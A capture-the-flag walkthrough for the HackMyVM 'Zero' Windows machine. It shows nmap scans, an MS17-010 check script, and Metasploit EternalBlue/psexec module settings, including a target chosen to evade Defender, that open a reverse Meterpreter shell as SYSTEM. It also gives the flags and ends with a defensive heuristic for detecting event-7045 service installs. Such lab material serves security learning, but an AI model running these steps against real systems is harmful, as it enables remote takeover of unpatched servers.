# Zero HackMyVM (Easy - Windows)

## Port scan

```shell
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>
```

```shell
nmap -sCV -p<PORTS> <IP>
```

Info:

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 03:29 EDT
Nmap scan report for 192.168.1.155
Host is up (0.00053s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-27 15:29:49Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: ZERO)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc        Microsoft Windows RPC
49695/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 08:00:27:1F:34:01 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-03-27T15:30:37
|_  start_date: 2025-03-27T15:24:26
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: DC01
|   NetBIOS computer name: DC01\x00
|   Domain name: zero.hmv
|   Forest name: zero.hmv
|   FQDN: DC01.zero.hmv
|_  System time: 2025-03-27T08:30:37-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:1f:34:01 (Oracle VirtualBox virtual NIC)
|_clock-skew: mean: 10h19m58s, deviation: 4h02m29s, median: 7h59m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.18 seconds
```

We see that no web page is hosted, but the host does run an `SMB` server and is a `Windows Server 2016`, so let's check whether the `SMB` server might be vulnerable given the version it may be running.

> detectVuln.py

```python
import subprocess
from rich.console import Console
from rich.panel import Panel

def check_smbv1_vulnerability(ip):
    console = Console()
    console.print(Panel(f"Escaneando [bold yellow]{ip}[/bold yellow] en busca de vulnerabilidad SMBv1 (EternalBlue)...", title="[bold red]SMB Vulnerability Scan[/bold red]", expand=False))

    try:
        # Run only the MS17-010 NSE check against port 445 and capture its output.
        result = subprocess.run(["nmap", "-p", "445", "--script", "smb-vuln-ms17-010", ip], capture_output=True, text=True)

        # The NSE script prints "State: VULNERABLE" when the check succeeds;
        # anything else (not vulnerable, SMBv1 disabled, unreachable) has no such line.
        if "VULNERABLE" in result.stdout:
            console.print(Panel("[bold red]¡El sistema es vulnerable a EternalBlue![/bold red] ⚠", title="[bold red]Vulnerabilidad Detectada[/bold red]", expand=False))
        else:
            console.print(Panel("[bold green]El sistema NO es vulnerable a EternalBlue.[/bold green] ✅", title="[bold green]Seguro[/bold green]", expand=False))

    except Exception as e:
        # Covers nmap not being installed (FileNotFoundError) and any other runtime error.
        console.print(f"[bold red]Error al ejecutar el escaneo:[/bold red] {e}")

if __name__ == "__main__":
    console = Console()
    ip = console.input("[bold yellow]Introduce la IP a escanear: [/bold yellow]")
    check_smbv1_vulnerability(ip)
```

We run it as follows:

```shell
python3 detectVuln.py
```

Info:

```
Introduce la IP a escanear: 192.168.1.155
╭────────────────────────── SMB Vulnerability Scan ──────────────────────────╮
│ Escaneando 192.168.1.155 en busca de vulnerabilidad SMBv1 (EternalBlue)... │
╰────────────────────────────────────────────────────────────────────────────╯
╭───────── Vulnerabilidad Detectada ─────────╮
│ ¡El sistema es vulnerable a EternalBlue! ⚠ │
╰────────────────────────────────────────────╯
```

We see that it has this vulnerability, so we will use `metasploit` for it.

## Escalate Privileges

### Metasploit

```shell
msfconsole -q
```

We will use the `eternalblue` `exploit`:

```shell
use exploit/windows/smb/ms17_010_eternalblue
```

We configure it as follows:

```shell
set LHOST <IP_ATTACKER>
set LPORT <PORT>
set RHOSTS <IP_VICTIM>
exploit
```

Info:

```
[*] Started reverse TCP handler on 192.168.1.146:7777 
[*] 192.168.1.155:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.155:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)
[*] 192.168.1.155:445     - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.155:445 - The target is vulnerable.
[*] 192.168.1.155:445 - Connecting to target for exploitation.
[+] 192.168.1.155:445 - Connection established for exploitation.
[+] 192.168.1.155:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.155:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.1.155:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.1.155:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva
[*] 192.168.1.155:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   
[+] 192.168.1.155:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.155:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.155:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.155:445 - Starting non-paged pool grooming
[+] 192.168.1.155:445 - Sending SMBv2 buffers
[+] 192.168.1.155:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.155:445 - Sending final SMBv2 buffers.
[*] 192.168.1.155:445 - Sending last fragment of exploit packet!
[*] 192.168.1.155:445 - Receiving response from exploit packet
[+] 192.168.1.155:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.155:445 - Sending egg to corrupted connection.
[*] 192.168.1.155:445 - Triggering free of corrupted buffer.
[-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.155:445 - Connecting to target for exploitation.
[+] 192.168.1.155:445 - Connection established for exploitation.
[+] 192.168.1.155:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.155:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.1.155:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.1.155:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva
[*] 192.168.1.155:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   
[+] 192.168.1.155:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.155:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.155:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.155:445 - Starting non-paged pool grooming
[+] 192.168.1.155:445 - Sending SMBv2 buffers
[+] 192.168.1.155:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.155:445 - Sending final SMBv2 buffers.
[*] 192.168.1.155:445 - Sending last fragment of exploit packet!
[*] 192.168.1.155:445 - Receiving response from exploit packet
[+] 192.168.1.155:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.155:445 - Sending egg to corrupted connection.
[*] 192.168.1.155:445 - Triggering free of corrupted buffer.
[-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.155:445 - Connecting to target for exploitation.
[+] 192.168.1.155:445 - Connection established for exploitation.
[+] 192.168.1.155:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.155:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.1.155:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.1.155:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva
[*] 192.168.1.155:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   
[+] 192.168.1.155:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.155:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.1.155:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.155:445 - Starting non-paged pool grooming
[+] 192.168.1.155:445 - Sending SMBv2 buffers
[+] 192.168.1.155:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.155:445 - Sending final SMBv2 buffers.
[*] 192.168.1.155:445 - Sending last fragment of exploit packet!
[*] 192.168.1.155:445 - Receiving response from exploit packet
[+] 192.168.1.155:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.155:445 - Sending egg to corrupted connection.
[*] 192.168.1.155:445 - Triggering free of corrupted buffer.
[-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
```

We see that it is indeed vulnerable, but for some reason the exploit is failing, so we can keep looking for `exploits` associated with the `MS17-010` vulnerability. If we search for that `vulnerability` we see the following:

```shell
search MS17-010
```

Info:

```
Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'
```

We see that there are `4` modules; the first is the `ms17_010_eternalblue` one we already tried, so let's try the `ms17_010_psexec` module.

```shell
use exploit/windows/smb/ms17_010_psexec
```

Now we configure it as follows:

```shell
set LHOST <IP_ATTACKER>
set LPORT <PORT>
set RHOSTS <IP_VICTIM>
exploit
```

We leave the `SMBUser` and `SMBPass` fields empty to do it anonymously, but if we also leave the `target` on automatic, we see the following:

```
[*] Started reverse TCP handler on 192.168.1.146:4444 
[*] 192.168.1.155:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 192.168.1.155:445 - Built a write-what-where primitive...
[+] 192.168.1.155:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.155:445 - Executing the payload...
[+] 192.168.1.155:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.
```

It attempts to create a `reverse shell` but does not succeed, since `Windows Defender` may be blocking it, so we will use another `target` that is more discreet.

```shell
show targets
```

Info:

```
Exploit targets:
=================

    Id  Name
    --  ----
    0   Automatic
    1   PowerShell
=>  2   Native upload
    3   MOF upload
```

We will use `Native upload` to upload a file automatically and get a `reverse shell`:

```shell
set target 2
```

Now if we run it again with `exploit` we see the following:

```
[*] Started reverse TCP handler on 192.168.1.146:4444 
[*] 192.168.1.155:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 192.168.1.155:445 - Built a write-what-where primitive...
[+] 192.168.1.155:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.155:445 - Uploading payload... GbsRXBhV.exe
[*] 192.168.1.155:445 - Created \GbsRXBhV.exe...
[+] 192.168.1.155:445 - Service started successfully...
[*] 192.168.1.155:445 - Deleting \GbsRXBhV.exe...
[-] 192.168.1.155:445 - Delete of \GbsRXBhV.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)
[*] Sending stage (177734 bytes) to 192.168.1.155
[*] Meterpreter session 1 opened (192.168.1.146:4444 -> 192.168.1.155:49834) at 2025-03-27 03:57:45 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

We see that it worked and we land directly as `NT AUTHORITY\SYSTEM`, so the machine is done; we read the `flags`.

> user.txt

```
HMV{D0nt_r3us3_p4$$w0rd5!}
```

> root.txt

```
HMV{Z3r0_l0g0n_!s_Pr3tty_D4ng3r0u$}
```
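From the defender's side, the trace the `Native upload` target left on `DC01` above (an eight-letter random `.exe` such as `\GbsRXBhV.exe` created at a share root, registered and started as a service, and then not deletable) is exactly what a Service Control Manager event 7045 ("A service was installed in the system") records. The following Python is an added example, not code from the original writeup: it runs a small corroborating heuristic over constructed 7045-style records; the flattened field names and every sample value except the `GbsRXBhV` name are assumptions.

```python
import re

# Constructed sample of Windows System log records (Event ID 7045), flattened to
# one dict per event. Field names are assumed; values are made up except for
# GbsRXBhV, the artifact name shown in the writeup's exploit output.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "DC01", "ServiceName": "GbsRXBhV",
     "ImagePath": "%SystemRoot%\\GbsRXBhV.exe", "StartType": "demand start"},
    {"EventID": 7045, "Computer": "DC01", "ServiceName": "MpKslDrv",
     "ImagePath": "C:\\ProgramData\\Microsoft\\Windows Defender\\MpKslDrv.sys",
     "StartType": "demand start"},
    {"EventID": 7045, "Computer": "DC01", "ServiceName": "MyApp",
     "ImagePath": "\"C:\\Program Files\\MyApp\\svc.exe\"", "StartType": "auto start"},
    {"EventID": 7036, "Computer": "DC01", "ServiceName": "Spooler", "ImagePath": ""},
]

# psexec-style modules drop an executable with an 8-letter random name.
RANDOM_EXE = re.compile(r"^[A-Za-z]{8}\.exe$", re.IGNORECASE)
# Directories where a freshly installed service binary is suspicious: share roots
# (ADMIN$ maps to %SystemRoot%, C$ to the drive root). Lower-case for comparison.
ROOT_DIRS = {"", "%systemroot%", "c:", "c:\\windows"}

def split_image_path(image_path):
    """Return (directory, basename) for a service ImagePath, stripping quotes."""
    path = image_path.strip().strip('"')
    directory, _, basename = path.rpartition("\\")
    return directory.lower(), basename

def score_event(event):
    """Return the reasons a 7045 event looks like a psexec-style install ([] if none)."""
    if event.get("EventID") != 7045:
        return []
    directory, basename = split_image_path(event.get("ImagePath", ""))
    if not RANDOM_EXE.match(basename):
        return []
    reasons = ["random 8-letter executable name"]
    if basename[:-4].lower() == event.get("ServiceName", "").lower():
        reasons.append("service name equals binary name")
    if directory in ROOT_DIRS:
        reasons.append("binary dropped at share/drive root")
    # The name pattern alone is weak (explorer.exe also has 8 letters), so require
    # at least one corroborating signal before reporting.
    return reasons if len(reasons) > 1 else []

def find_suspicious_services(events):
    """Return {ServiceName: reasons} for every event that trips the heuristic."""
    hits = {}
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits[ev["ServiceName"]] = reasons
    return hits
```

Note that the example only checks service-install events; a Sysmon file-creation event for the same `.exe` under `%SystemRoot%` would be the second place to corroborate it.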

